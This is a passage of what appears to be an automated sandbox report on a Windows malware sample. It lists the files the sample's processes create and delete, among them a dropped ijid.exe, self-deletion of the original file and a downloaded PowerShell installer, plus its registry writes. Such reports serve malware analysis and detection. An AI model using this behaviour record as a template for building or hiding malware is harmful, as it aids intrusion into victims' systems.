%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)

The process mscorsvw.exe:2712 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp (0 bytes)

The process mscorsvw.exe:592 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index62.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp (0 bytes)

The process mscorsvw.exe:4084 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index61.dat (0 bytes)

The process mscorsvw.exe:3000 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5e.dat (0 bytes)

The process mscorsvw.exe:2784 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)

The process mscorsvw.exe:2208 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)

The process mscorsvw.exe:2348 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)

The process mscorsvw.exe:3668 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)

The process mscorsvw.exe:3520 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5f.dat (0 bytes)

The process mscorsvw.exe:2088 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)

The process mscorsvw.exe:3784 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index60.dat (0 bytes)

The process mscorsvw.exe:2572 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp (0 bytes)

The process mscorsvw.exe:2108 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index63.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp (0 bytes)

The process PSCustomSetupUtil.exe:3940 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\0JNQTWZ3\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2968 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\0KNQTX03\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:4016 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\YHKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)

The process PSCustomSetupUtil.exe:3060 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\1MQTWZ26\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:3308 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\7QTW0369\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2944 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\K58BEHKO\System.Management.Automation.dll (81046 bytes)

The process PSCustomSetupUtil.exe:3008 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\2MPSVY25\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:3348 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\L58CFILO\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process PSCustomSetupUtil.exe:3432 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\VEILORUY\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:3100 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\TCFJMPSV\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:3124 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\N7ADHKNQ\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:3184 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CVY258BE\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:3992 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\EY147ADG\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)

The process PSCustomSetupUtil.exe:3404 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\AUX147AD\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process PSCustomSetupUtil.exe:3284 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\GZ258CFI\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3248 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\EX0369DG\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:4052 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\O9CFIMPS\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)

The process PSCustomSetupUtil.exe:3224 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\1LORUX14\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:4076 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\EX0369CF\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3372 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\P9DGJMQT\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process PSCustomSetupUtil.exe:3032 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\EY148BEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:3964 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\YGJMPTWZ\Microsoft.PowerShell.Editor.dll (32824 bytes)

The process PSCustomSetupUtil.exe:3156 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\5ORUX047\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSSetupNativeUtils.exe:1552 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)

The process regsvr32.exe:304 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (29849 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ijid\ijid.exe (1625 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
C:\%original file name%.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ijid\ijid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (0 bytes)

The process regsvr32.exe:1496 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)

Registry activity

The process %original file name%.exe:1076 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 2E 60 8B 4D 6B 7D 4D 1E CF CF 07 46 EA D4 8C"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE]

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE]
"(Default)"

The process mofcomp.exe:2912 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 07 5A 6F DB 30 10 BC 6C 35 BB C5 B7 E0 A1 96"

The process WindowsXP-KB968930-x86-ENG.exe:472 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 79 08 36 1A 40 55 D8 7E 64 DE C6 DA C1 3A 3C"

The process ngen.exe:308 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 8A 58 CA 7C 98 2F C9 EB D9 27 3A 6D 23 E4 32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3824 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 3E EC 63 07 E2 80 2D 7E 9A E9 31 DC DD EE FC"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3776 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 50 03 A0 50 9E 09 CF 93 2F 7C 93 DA D4 F3 75"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3864 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 CB 23 5D 39 5B DC 5B 14 69 AD 0D 71 0D BA 15"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3736 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 B8 7B 79 C6 C0 A3 3D 26 E9 0D 70 77 A2 73 F2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3832 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 C4 98 7F 25 86 21 3E CD 57 DF 52 80 09 8D A7"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3792 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 04 40 9D DC 1F 8B FC 5E C8 0C B8 1E 81 D6 79"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:320 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 7B A8 18 A5 DC 40 27 F8 0D A3 CC 38 81 74 CA"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:1504 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 C4 B2 D1 20 33 8E 22 8B 21 29 09 44 A0 9E C5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3760 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA F6 25 9D D1 69 56 9F 71 95 8A 06 F0 02 D8 FE"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:3816 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 50 08 AA 6E 6D 06 3A 33 66 D2 D2 02 54 C4 4C"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
